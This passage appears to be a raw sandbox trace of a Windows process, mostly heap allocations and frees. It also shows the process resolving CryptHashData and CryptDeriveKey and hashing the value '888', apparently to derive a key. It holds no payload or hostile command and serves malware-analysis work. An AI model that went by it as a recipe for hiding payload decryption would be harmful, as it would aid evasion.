lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0212.559] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0212.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e48 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0212.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.560] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e78 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.561] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0212.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0212.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0212.561] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0212.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0212.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.563] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0212.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50a40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0212.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.563] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0212.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0212.563] CryptHashData (hHash=0xa870d0, pbData=0x2e54e38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0212.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0212.564] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.564] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509e0 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0212.564] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0212.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0212.565] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b90 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0212.565] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0212.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0212.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0212.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0212.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0212.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0212.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50bf0 [0212.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0212.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.569] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0212.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0212.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0212.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0212.596] 